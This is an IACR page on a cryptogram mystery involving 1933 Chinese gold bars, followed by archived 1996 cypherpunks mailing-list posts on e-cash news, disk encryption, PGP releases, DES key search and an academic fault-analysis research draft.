http://www.iacr.org/~iacr/china/china.html


Cryptograms on Gold bars from China


The following mystery was brought to IACR by the 
curator of a museum in the US. I don't have the 
complete story, but it seems that seven gold bars
were allegedly issued to a General Wang in Shanghai, 
China, in 1933. These gold bars appear to represent 
metal certificates related to a bank deposit with
a U.S. Bank. The gold bars themselves have pictures, 
Chinese writing, some form of script writing, and 
cryptograms in latin letters. 

Not surprisingly, there is a dispute concerning the 
validity of the claim for the deposit. It may
help to resolve the dispute if someone can decipher 
the cryptograms on the bars. Nobody has yet
put for the a theory as to their meaning. I am also 
unable to recognize the script writing. The
Chinese writing has been translated, and discusses a 
transaction in excess of $300,000,000. It also refers 
to these gold bars which weigh a total of 1.8 kilograms. 

To assist in your investigation, I have compiled the 
cryptograms and their arrangements. Below are images 
of the bars, available in two sizes. The ones shown 
here are about 20K each, and clicking on any of them 
will download a larger version (about 200K). The gold 
bars were photographed against a blue or green 
background that appears around some edges. 

Unfortunately, neither I nor IACR can provide any 
further information regarding this. If you are
seriously interested in trying to solve the mystery, 
I advise you to contact one of the following
individuals: 

     Bin J. Tao 
     15475 Rochlen St. 
     Hacienda Heights, CA 91745 
     USA 
     Telephone and fax: (818) 333-6125 

     Peter Bisno 
     Law Offices of Bisno and Samberg 
     201 South Lake Avenue 
     Suite 411 
     Pasadena, CA 91101-3016 
     USA 
     Telephone: (818) 585-8899 
     Fax: (818) 585-1899 

[14 images of golden cryptograms; some appear to show a 
bearded, pony-tailed cryptoanarchist]

prepared by Kevin McCurley

-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 23 Oct 1996 11:34:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,
In-Reply-To: <846082070.4963.0@fatmans.demon.co.uk>
Message-ID: <9Hg0VD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Bradley <paul@fatmans.demon.co.uk> writes:

> > 
> > Yes. Timmy May is a fat turkey.
> 
> Doctor Vulis, you do indeed enlighten us mere mortals in an 
> astonishing way with your witty commentary and razor sharp mind.

Thank you for the compliment.
> 
> How long did it take you to think of the above insult?

No more than a second. You see, I have better things to do that engage
in flame wars, unlike Timmy May who spends hours glued to his terminal,
trying to invent new flame baits and chortling at his supposed cleverness.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Wed, 23 Oct 1996 10:25:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netscape Show - Security API
In-Reply-To: <199610231541.KAA02706@homeport.org>
Message-ID: <0mPZGs200YUg0=I3Y0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
>         Speaking of Netscape security, it would be nice to be able to
> write code that controlled various settings on a per site basis, ie,
> I'll take cookies from the New York Times (one per session), and as
> many as Amazon.com wants to send, but nowhere else, and Javascript
> only if its signed by Dr. Dobbs or comes from www.mycompany.com.

As far as cookies go, if you have a Mac, you can download my
CookieCleaner (Applescript, source code included, GPL) or Scott
Barnham's cookiecutter executable (freeware, no source) from any
info-mac mirror.

cypherpunks write code or something,
Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Reece <reece@taz.nceye.net>
Date: Wed, 23 Oct 1996 07:08:59 -0700 (PDT)
To: ghio@myriad.alias.net
Subject: Re: IP spoofer
In-Reply-To: <199610221926.PAA27382@myriad>
Message-ID: <19961023140855.7661.qmail@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 22 Oct 1996 15:26:17 -0400
   From: Matthew Ghio <ghio@myriad.alias.net>


   In order to do a successful IP spoofing, you must either gain access 
   to the routing mechanism for one or more non-local IP addresses, or
   spoof a DNS (Domain Name System) server.

Or guess the sequence number the other end proposes.



-- 
Bryan Reece, fixer, EyeNET Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 23 Oct 1996 14:22:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <9ZN0VD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hong Kong's Largest Bank Debuts Mondex Credit Card

By P.T. Bangsberg

Having been beaten into the lead, Hong Kong's largest bank is fighting back
with a card it says is smarter than its rival's in a bid to capture the
cashless market.

Hongkong & Shanghai Banking Corp. last week unveiled Mondex, a point-of-sale
card that can be reloaded with funds. It's described as the first of its kind
in Asia.

As reported, the Hong Kong unit of Britain's Standard Chartered Bank PLC and
the local arm of Bank of China fired the first shots in the battle last August
with a card from Visa International Inc.

A Prime Visa Cash card worth 200 Hong Kong dollars ($25) is bought from any
branch of the participating banks at face value. It is then used in retail
outlets without the need to show proof of identity or "swipe" to check on
available funds.

London-based Mondex International Ltd. is owned by 17 firms in North America,
Asia, Australasia and Europe. Unlike the Visa card, Mondex allows users to top
up the stored cash value from their bank accounts using automated teller
machines.

Users can also transfer electronic cash to and from customers by phone or ATM
and send electronic money to others using Mondex-compatible telephones.

"We see Mondex as being not just a newfangled product, not just a piece of

hip gadgetry, but a development that places Hongkong Bank...at the crest of
the electronic banking wave sweeping the globe," said Hongkong Bank chief
executive David Eldon.

Michael Keegan, chief executive of Mondex, told the formal launch ceremony the
firm is exploring means of payment via the Internet. The chief concern about
payments via the worldwide network of computer sites has been lack of
security, potentially allowing unauthorized people to discover card numbers.

The initial Mondex marketing campaign will be restricted to about 400
merchants in two of Hong Kong's largest shopping malls. Usage will be
broadened next year, company officials said by telephone.

Prime Visa Cash was rolled out with about 1,000 retail outlets. "As the first
reloadable electronic cash card in Hong Kong, Mondex changes money as we know
it, delivering valuable new features which improve on physical cash," said
Alexander Au, chairman of Hang Seng Bank Ltd., a unit of Hongkong Bank.
Features include transfer of electronic cash over a telephone line with the
ability to "lock" the card to prevent unauthorized access, and the maintenance
of an electronic statement of recent transactions.



American Banker: Monday, October 21, 1996

Cybercash Takes Early Lead In Race for New Currency Role

By JENNIFER KINGSON BLOOM

In the foyer of Cybercash Inc.'s office in Reston, Va., hangs a tinsel rocket
ship adorned with paper streamers and the words "Cybercoin is launched!"

It is a hopeful metaphor for the company's mission: to convince bankers and
others that a pot of gold awaits those who find the right way onto the
much-hyped new medium.

Dozens, maybe hundreds, of companies are in the race, and at the moment,
Cybercash seems to be at the front of the pack. The two-year-old company has a
proven leadership team, a jolt of funds from Wall Street, and the confidence
and partnership of a growing cadre of banks.

Cybercash makes software that facilitates Internet payments. At the core is an
"electronic wallet" for buying items with credit cards from on- line
merchants.

Last month, the company enriched its wallet with electronic coins. The virtual
equivalent to a stack of chips at a casino, the Cybercoins are meant to be
spent on things that cost between 25 cents and $10, perhaps news articles,
pictures, or software.

Several powerful banks -- including First Union Corp., Wachovia Corp., and PNC
Bank Corp. -- are planning to offer Cybercoins in pilots. Others, including
Wells Fargo & Co. and BankAmerica Corp., already offer the

Cybercash wallet with its credit card capability.

Cybercash officials hope their early entry gives them an edge. But they are
bracing for competition with "major, well-funded players," said William N.
Melton, chief executive officer and co-founder of Cybercash. "There is not
going to be a single, major, well-funded player that doesn't have its finger
in the pie someplace."

That is good news and bad news, Mr. Melton says: "If we were the only ones
there, you might say we were ill-advised and were pouring money down
returnless holes. But when you have every single major player from AT&T to IBM
to all the card associations playing -- you name it, they're there -- it will
happen."

The "it" is Internet commerce. Bankers, transaction processors, and system
vendors seem viscerally convinced that electronic commerce is poised for
takeoff. They are less sure how the ascent will proceed.

"No one knows who's going to win this thing," said Michael P. Duffy, group
executive of direct marketing operations for First USA Paymentech. "There's a
keen amount of interest, but the public hype is probably out in front of
what's actually happening."

First USA Paymentech, one of the leading processors of card transactions for
merchants, is handling payments for Cybercash. But there is no exclusivity:
First USA also has processing agreements with First Virtual Holdings and Open
Market, two competitors in Cybercash's realm.

Paymentech chief executive Pamela H. Patsley described her company as the
leader in the "non-face-to-face market."

"It's our strategy to work with several of the leading solutions that are
coming to market," she said. "Certainly, Cybercash is a leader in this
industry."

First Data Corp., which also does processing for Cybercash, shares the
philosophy of backing any product that shows promise of acceptance.

"This is a new thing, there's nothing out there filling that role, and this is
the first one to market," Chuck White, a First Data senior vice president,
said of Cybercoin. "I think the banks are essentially in the same position we
are: they want to make sure they are providing the support that the market
needs."

Banks, too, are working with multiple partners, seeking as much insight as
possible on a business full of question marks.

"It's easy and smart to have partnerships with these competing ventures," said
Martha C. Campbell, until recently a senior vice president at BankAmerica. She
helped bring Cybercash's wallet to the bank.

"My sense is that we're still so early into this market . . . that it's really
hard to tell who's going to be a keeper and who's not," Ms. Campbell said.
"Some of them may become the standard providers and survive, but I think it's
quite likely none of them will."

Like BankAmerica, Wells Fargo is offering the Cybercash wallet for credit
cards, but has not yet decided on Cybercoin.

"We're aware of it and we're looking at it - we're looking at all options
available to our customers," said Debra B. Rossi, Wells' senior vice president
of electronic payment solutions.

Cybercash's own strategic partners include Mondex International, the smart
card developer, and Verifone Inc., the transaction automation pioneer Mr.
Melton founded in 1981. Ironically, Verifone is promulgating its own scheme
for Internet payments and has its own set of bank and technology partners
(some also allied with Cybercash).

Hatim A. Tyabji, Verifone's CEO, resigned from Cybercash's board this year to
avoid any conflicts of interest. Even so, executives at each company say they
do not intend to step on one another's toes; Verifone's systems are geared
toward larger-ticket items than Cybercash's.


"When we're mature and running, we would anticipate that probably 40% to 50%
of our corporate income will come from the coin product," Mr. Melton said.

Another 30% to 35% would come from an "electronic check" the company plans to
add to its wallet in early 1997. The virtual check would draw against a
consumer's bank account when a purchase was made.

Only 15% of income is ultimately expected to come from credit card payments.

"The biggest opportunity for us will be digitized goods that will be sold for
a small amount of money," said Gene Reichers, Cybercash's chief financial
officer. "Some of our overseas partners think the single biggest market will
be electronic games."

First Union buys into Cybercash's notion that there is "an interest in paying
for small things as you go," said Parker Foley, vice president and director of
electronic commerce.

Beginning in November, First Union customers will be able to download a
bank-branded wallet and experiment with micropayments among 25 to 30
merchants. The pilot will last three or four months, Mr. Foley said.

"There is a niche that Cybercoin fills nicely, where credit cards aren't
really efficient because the transaction is so small," Mr. Foley said.

"We don't believe it would be in our customers' best interests to lock
ourselves into one payment system," Mr. Foley said. "Right now, Cybercoin is
really the only coin product that's actually going to be nationally available,
outside of a couple of very controlled pilots in almost proprietary systems."

He was referring to Ecash, the Internet coin system of Digicash Inc. that Mark
Twain Bancshares of St. Louis is testing.

Digicash is often mentioned in the same breath as Cybercash, but its Internet
payment scheme is a different breed and has not caught on in U.S. banking.
This has not stopped Digicash from criticizing Cybercash.

"Their definition of cash -- it's not cash," said Daniel M. Eldridge, vice
president of Digicash. "Cash is a bearer instrument. Theirs doesn't sound like
a bearer instrument to me."

Mr. Eldridge also denigrated Cybercash's $34 million initial public offering
as "puffery . . . They have no earnings and no revenue."

The boom that benefited Cybercash and other hot Internet IPOs is over, but Mr.
Melton is unfazed.

"The analyst models on the Street at the time of the IPO said we would do
almost no revenue in '96, a fair amount in '97, and would go up rapidly in
'98," he said. "Those models are tracking, so there are no surprises. We did
tell the Street that the major thing to look for this year was new strategic
relationships.

"We said this would be a year of building infrastructure, and I think that is
happening."

Cybercash has about 200 employees, most of them in the Reston headquarters or
Redwood City, Calif.

Mr. Melton, who established his payments credentials in the start- ups of
Verifone and Transaction Network Services Inc., founded Cybercash with Daniel
C. Lynch, Bruce G. Wilson, and Stephen D. Crocker.

Mr. Lynch brought on board Magdalena Yesil, a consultant and engineer whose
specialty was the commercialization of the Internet, as a co-founder.

"Bill knew that Dan was an Internet guru, and Dan knew that Bill was a founder
of Verifone," Ms. Yesil recalled. "Bruce was Bill's due-diligence guy in his
investments, and Crocker was the security expert."

Barely a month after Cybercash was incorporated in August 1994, Visa and
Microsoft issued a joint announcement that they were working together toward a
secure Internet payment system. That could have spelled disaster for the
upstart, but its leaders were heartened.

"It shone the limelight right in our area, the turf we had just carved out for
ourselves," Ms. Yesil said.

As Cybercash's chief spokesman during its infancy, Ms. Yesil said her job was
"to articulate the vision in just a few words, and never be too tired to give
yet another speech, to talk to another reporter."

"Early on, we were very much bunched with First Virtual and Digicash, and I
think that has changed significantly," said Ms. Yesil, who left Cybercash two
months ago to start her own Internet company.

"I tip my hat to them -- they've got to be months, possibly a year ahead" of
the competition, said Scott Smith, an analyst at Jupiter Communications in New
York and a former banker at Wachovia Corp.

Mr. Smith said the Cybercash wallet, once viewed as a proprietary innovation,
has set a standard that will heighten the company's appeal to banks.

"Cybercash has got an edge because they've been out there making alliances
with banks and processors," Mr. Smith said. "They want to be seen as
bank-friendly."

With organizations as varied as Digital Equipment Corp. and Microsoft in the
Internet payments mix, how long Cybercash's prominence will last is open to
debate.

"Cybercash is in a position of benefiting from the early excitement," said
Michael Gould, an analyst at the Patricia Seybold Group in Boston, who
recently completed a report on secure Internet payments.

Cybercash and others have filled a void "as more conservative financial
institutions are sitting back, watching, and waiting," he said. "Over the long
term, however, I think in some manner the role that Cybercash is playing will
end up being subsumed by some of the larger organizations."

Another obstacle Cybercash faces -- as do other purveyors of Internet-based
applications -- is that its wallet remains hard to use.

A prototype that consumers can download free from Cybercash's Web site is
difficult to install for anyone who is not highly computer literate. It cannot
be used with Macintosh computers and is just becoming available through
America Online, the most popular on-line service.

Mr. Melton said these kinks will be ironed out. The existing wallet, he said,
is more a proof-of-concept than a final product. The ultimate goal is to offer
the wallet directly to consumers through their banks, which will brand it and
present it in an easy-to-use way.

"One thing we've done better than anybody else is design our system to be
integrable with banking back-room systems," said Larry Gilbert, Cybercash vice
president and general manager of coin services. "We made a conscious effort
from day one to build a system that was easily adopted by banks, that used the
types of systems they were accustomed to. We know how difficult it is to make
that change."

Mr. Melton says the only thing holding back electronic commerce is the time
and effort to get new technology in place.

"Fear of safety, lack of technology were last year's barriers," Mr. Melton
said. "Most of those issues have either been put to rest or are now being put
to rest.

"Any banker today has a very full plate," he added. "He's got to bring this
technology into the suite of offerings he brings to his merchants. He's got to
have the operations manuals that go along with that, he's got to build it into
his systems."

Mr. Melton predicts the logistical problems will be worked out over the next
year, yielding an electronic commerce system controlled by the banks.

"Who are the winners going to be?" he asked. "Obviously, in any mature market
there's not going to be a single winner. There are going to be multiple
winners.

"But we've made our bet," he said: "on the banks."


News Release (Visa International): October 17, 1996

UK Consumers Demand Electronic Banking

Nearly two out of three people in the UK would like to check their bank
balances and pay bills via a home computer, and nearly three-quarters believe
that new technologies, such as the PC and the Internet, will continue to
change the way in which we work and live.

These are just some of the findings revealed in a survey commissioned by Visa
UK Limited into the British public's views of the impact of new technologies
on their lives in the future. The survey was conducted earlier this year by
Gallup among a representative sample of over 1,900 men and women throughout
the UK. Its findings are included in a special report called "The Way Ahead",
published today by Visa.

According to the survey, 56 per cent of UK residents believe the pace of
technological change will increase dramatically over the next ten years.

Interestingly, this pace of change is most clearly recognised by those aged
between 35 and 44 -- two-thirds of this age group think so, compared with just
over a half of 16 to 24-year olds.

The survey also reveals the British public's views of technological and
financial developments in the 21st century. For example:

- 88 per cent of those questioned expect many more homes to have a personal
computer - 62 per cent foresee an increase in home shopping via a PC or the
Internet

The primary use for PCs in 21st century homes will be to "pay bills and manage
bank accounts" (70 per cent), and "working from home" (69 per cent). The third
most popular use will be to use a PC to "shop from home" (62 percent).

Fiona Wilkinson, general manager of Visa UK Limited, says:

"The survey confirms our view that consumers want easy-to-use and
easy-to-access electronic systems to help them manage their financial affairs,
as well as purchase goods. That is why we are currently developing, in
partnership with our M-ember financial institutions, a number of leading edge
electronic systems, such as remote banking and chip based payment cards. These
will enable Members to offer their customers access to information or use
their money at any time, wherever they happen to be."

The Impact of New Technologies According to the survey, 56 per cent of people
in the UK believe the pace of technological change will increase dramatically
over the next ten years. Interestingly, this pace of change is most clearly
recognised by those aged between 3 5 and 44 -- two-thirds of this age group
think so, compared with just over a half of 16 to 24-year olds.

Given the opportunity today to use a home computer to "obtain information and
advice or communicate with others", the top choice by far (63 per cent of
people) is to check their bank balances and pay bills. The second most popular
choice (51 per cent) is to help educate children, while 39 per cent want to
use technology to discover more information about their general interests.

Electronic Shopping Latest reports from Romtec, the computer industry analyst,
indicate that over six million households in the UK (equivalent to a quarter
of all homes) now have a PC. It is estimated that this figure will rise to at
least 14 million households by the turn of the century.

Given the opportunity today to use a home computer or a similar device to buy
things rather than go out to shop, 36 per cent of those questioned said they
definitely would buy goods electronically. Typical reasons given were "it'S
simpler, easier and less effort" (30 per cent); "it's more convenient" (21 per
cent); and "it saves time and is quicker"' (17 per cent).

Men appear to be more willing to use a PC to do the shopping than women

-- 40 per cent of men compared with 32 per cent of women. This apparent t
greater willingness of men to experiment with new technologies supports the
view of an almost equal proportion of men and women (12 per cent of Men and 14
per cent of women) who think that men are more comfortable using new
technology than women.

When asked which goods or services they would consider buying or looking at
using a computer, top of the list was "checking what on and where" (54 per
cent), followed by "choosing a holiday or flight" (46 per cent). The third
most popular choice was "choosing a new car" (29 per cent).

Future of the UK Banking Industry Commenting on the implications of the new
technologies for the banking industry, Fiona Wilkinson said: "Financial
institutions that embrace the latest technologies and offer services such as
remote banking and electronic commerce will attract a growing segment of
innovative customers -- those who want to save themselves time and trouble in
managing their financial affairs.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 23 Oct 1996 12:25:22 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Sybase questions
Message-ID: <199610232030.PAA04085@homeport.org>
MIME-Version: 1.0
Content-Type: text


Can someone tell me if there are any cryptographic hash functions
available within Sybase?  I'm loking to implement an HMAC.

Also, does anyone know if the Sybase rand() function is derived from
UNIX, and if not, how it works?

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 24 Oct 1996 10:25:21 -0700 (PDT)
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Random numbers for DES search.
Message-ID: <846173714.7575.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I wrote:
> >  Yep.  You don't need unpredictability or other attributes that
> >  are usually necessary for crypto PRNGs.  Basically all you
> >  need is a good uniform distribution.  A quality PRNG like the
> >  ones used for simulations and games will work fine.  No need
> >  to use Blum-Blum-Shub or other fancy (and slow) generators.
> >  A linear-congruential generator or an LFSR would probably do
> >  the trick.

This really doesn`t seem a good idea to me seeing as not only are we 
going to be wasting time on an LFSR runtime wise but we will be 
covering a lot of duplicate keyspace, if you look at the mersenne 
prime finding exercise which has its homepages somewhere on 
compuserve (i`ll give the address if you need it but I can`t remember 
it at the moment) they have a set of numerical blocks of exponent 
space that are allocated to people then removed from the list, not an 
option of course if we are going to be "stealing" runtime, unless we 
do it on networked workstations using some sort of UDP packet or 
similar.

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 24 Oct 1996 12:03:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Finally -- A crypto question from me...HD encryption
Message-ID: <846173715.7579.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > Are there any good programs out there that can encrypt my HD??  Since
> > there probably are, please mention some and where I can get them.  Also,
> > no one mention PGP.
> 
> Yes, the KOH disk encryption system. It is a small little thing that 
> encrypts the FAT (I believe)

That would be totally useless, you don`t need the FAT to recover the 
data.

Do a web search for a program called SFS, that will encrypt the whole 
HD.

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 23 Oct 1996 07:22:29 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Finally  --  A crypto question from me...HD encryption
In-Reply-To: <19961022.120701.9990.2.h2@juno.com>
Message-ID: <Pine.GSO.3.93.961023155210.6579B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Tue, 22 Oct 1996, Michael B Amoruso kirjutas:

> Are there any good programs out there that can encrypt my HD??  Since
> there probably are, please mention some and where I can get them.  Also,
> no one mention PGP.

F-Secure Desktop from Data Fellows is pretty good. It uses Blowfish
algorithm which means it is very fast on 32-bit Windows machines.

More information at http://www.datafellows.com/f-secure/

Jüri Kaljundi                         AS Stallion
jk@stallion.ee                        WWW ja andmeturva teenused
                                      http://www.stallion.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 23 Oct 1996 08:54:18 -0700 (PDT)
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: Re: MD5?
In-Reply-To: <199610231432.KAA14191@charon.MIT.EDU>
Message-ID: <Pine.BSI.3.95.961023155055.18225C-100000@usr10.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Oct 1996, Derek Atkins wrote:

> Black Unicorn wrote:
> 
> > Is MD5 essentially history?
> > 
> > Aside from MacPGP 2.6.3, is there a pgp version which will support
> > anything else?
> 
> Since you asked this in the future tense, PGP 3.0 will support
> SHA.1
> 
> -derek
> 

	well, that is alright, &c.   BUT WHEN WILL 3.0 RELEASE?
    it has been imminent for at least 2 years.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 23 Oct 1996 15:58:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: What is the status of the X9 committee WRT 3DES?
Message-ID: <199610232258.PAA02718@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know (especially those from EFF since they petitioned
the committee) what is the final result of the X9 committee's
decision WRT 3DES?  If they have decided, have they proceeded with
implementation plans?  Schedules?  Has the NSA tried to trip them
up further?

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Wed, 23 Oct 1996 16:18:39 -0700 (PDT)
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: Re: MD5?
In-Reply-To: <199610231610.MAA14566@charon.MIT.EDU>
Message-ID: <Pine.3.89.9610231604.A10493-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 23 Oct 1996, Derek Atkins wrote:

> > 	well, that is alright, &c.   BUT WHEN WILL 3.0 RELEASE?
> >     it has been imminent for at least 2 years.
> 
> It'll be released when it's done, dammit!  And it's almost done!
> Currently, I'm tracking down a few bugs, and a few details need to get
> solidified, but other than that I have it working on my desktop and I
> use it almost every day.
> 
> It's still got some testing to do, and it needs to get packaged up.
> And it still needs to get cleaned up a lot (the UI ain't pretty --
> even compared to 2.6.2!)  This is what is taking so long.
> 
> Come on, EVERY SINGLE LINE OF CODE WAS RE-WRITTEN!  And there are
> about 60000 lines in PGP3!  That's a lot of work, and the
> 70-30/80-20/90-10 rule is hitting hard.
> 
> It's coming.  We're trying to get it out as fast as we can.  But
> we're not going to sacrifice quality for a little bit of time.
> 
> -derek
> 
> 

Relax Derek,

Attila hasn't been bitting you in public over this. Patience is not one 
of his virtues sometimes, but I have never known him to be purposefully 
rude and pushy, unless invited.

I can understand that a 60K line project from the ground up can be most 
tedious exercise; sometimes a real mountain to climb. I've done this dance 
for 17+ years in many venues. However, in terms of volume, you are 
complaining at someone whose last project was 1 million+ lines of code; 
most of which he wrote himself. Volume and 90/10 doesn't impress Attila.

Instead of carping at him out of frustration; why not ask him for some 
help? 

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 23 Oct 1996 17:42:44 -0700 (PDT)
To: zaid@hardnet.co.uk
Subject: Re: wired wankers
Message-ID: <3.0b28.32.19961023174854.0073fd78@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



> ....seems like very few people know who or what cypherpunks are - good or
bad?

Doesn't matter if anyone likes it or not. "Cypherpunk" has no unambiguous or
universally understood meaning. It's a cute turn of phrase. They are/it is a 
mailing list. It is the subject of a manifesto written several years ago.
Sometimes people get together and talk about "cypherpunk" things.

Assuming that "cypherpunk" will ever have even as much clarity of meaning
as a 
term like "libertarian" is a mistake. It does not mean "people who agree
with you". The best description I can think of is that "cypherpunk" refers
to the intersection of politics, economics, and technology at the
micro/street level, and people who are interested in that or the macro
consequences of these micro changes. The fact that someone's interested
doesn't mean you can predict what they think about any of the constituent
subjects. Eric Hughes' "Cypherpunk Manifesto" puts a pro-liberty spin on
cypherpunkism, which isn't bad but did not predict the tension between
various factions/doctrines which has emerged, some of which are
anti-liberty or liberty-agnostic. The cypherpunks list has become a
discussion place for those various factions as well as a target for various
mass mailings and crypto-law-politics related announcements. Some
traditionalists (fundamentalists? :) continue to use it for discussions
related to deploying tools for privacy in a technological age but they're a
minority these days. One sect has split off to "coderpunks", seeking a
return to the more traditionalist focus. 

You can describe yourself as a "cypherpunk" if you want to but if you mean
"mailing list reader/participant" it's not especially interesting; and if
you mean something else you're adopting a label whose meaning is more like
a thermometer than a road sign.  


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 23 Oct 1996 15:56:16 -0700 (PDT)
To: coderpunks@toad.com
Subject: Quisquater's improvement on fault exploitation
Message-ID: <199610232252.SAA01242@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message
Date: Thu, 24 Oct 1996 00:05:07 +0200 (MET DST)
From: Jean-Jacques Quisquater <Quisquater@dice.ucl.ac.be>
Message-Id: <199610232205.AAA28550@absil.dice.ucl.ac.be>
To: benaloh@microsoft.com, canetti@theory.lcs.nmit.edu, daw@cs.berkeley.edu,
        mab@research.att.com, mihir@watson.ibm.com, schneier@counterpane.com
Subject: new use of a new attack
Cc: Quisquater@dice.ucl.ac.be

Hi,

here is my small contribution in the field. Your comments are welcome.

Kind regards,

Jean-Jacques,

- ----
Research announcement:

Short cut for exhaustive key search using fault analysis:
Applications to DES, MAC, keyed hash function, identification protocols, ... 

Jean-Jacques Quisquater,

UCL Crypto Group
Louvain-la-Neuve
Belgium
jjq@dice.ucl.ac.be

October 23, 1996

(ABSTRACT and DRAFT)

I confirm that the timing attack was well known to designers of smart
cards for some time.
- --- Jean-Jacques Quisquater, Dec. 20, 1995, sci.crypt

I'm a bit puzzled by the excitement over error analysis attacks --
they've been known for some time to cryptosystem implementors ...
- --- Paul Kocher, Oct. 20, 1996, comp.security.misc

How to find a secret key faster than the exhaustive search without the
help of the differential analysis.
- --- This paper

During the last months very interesting programs, papers and
announcements were released about the (cryptanalytic) use of transient
faults in tamper resistant (or proof) devices by:

- - some well-known anonymous authors (in the payTV context; SFS);
- - Anderson and Kuhn (applications well fitted to the real world);
- - Boneh, Demillo and Lipton: they specifically attack public key cryptosystems;
  their core attack bells an alert to the scientific community to
  publish faster (-: sorry my keyboard do not like to use :-) in that order);
- - Biham and Shamir: they described how to obtain a secret key (e.g. for DES)
  using few ciphertexts. 

This list is open and we reserve some room in this paper for the
- - future unknown authors.

Here we describe a new use of such attacks in order to accelerate
exhaustive keysearches in several contexts. We don't discuss if these
attacks are feasible: our main goal is to enumerate all possible
attacks and their cryptanalytic use against specific models. Knowing
that will improve our trust about the current or future devices in
order to obtain a reasonable level of security in a complete system.

Introduction

We suppose that the opponent is in possession of the secure device,
able to know the (external) inputs and the outputs and to apply some
physical constraints in order to trigger some transient errors at
some random locations (RAM, registers, ...). We suppose that these
errors do not interfere with the program used by the computations:
these errors only modify some data at some stage of the computation.
We do not here discuss the possibility of permanent errors: it will
be explained in the full paper (incremental permanent errors with
possible use of several secure devices, ...).

They are many protocols where the input message and the corresponding
output message are accessible to everybody including the opponent
if the device is physically in the hand of the user (maybe for some short
period of time):

Let f be a public cryptographic function, computed by some secure device
      (smart card, secure black box, security hardware, ...),
    k a secret key, stored by the secure device,
      guessing its value is the goal of the opponent in this paper,
    n the number of bits of the key k,    
    K is the set of all keys for f,    
    N the number of possible keys in K,
    m an input message,
    c an output message.

General protocol:
    input:  m
    output: c = f(m, k)

Examples:
- - encryption of m by any secret key algorithm (DES, IDEA, ...),
- - decryption of m by any secret key algorithm (DES, IDEA, ...),
- - computation of the hashing of m by the keyed hash function f (MAC, ...),
- - m is a random number used by some identification protocol,
- - ... .

Such protocols need very often some protections against possible
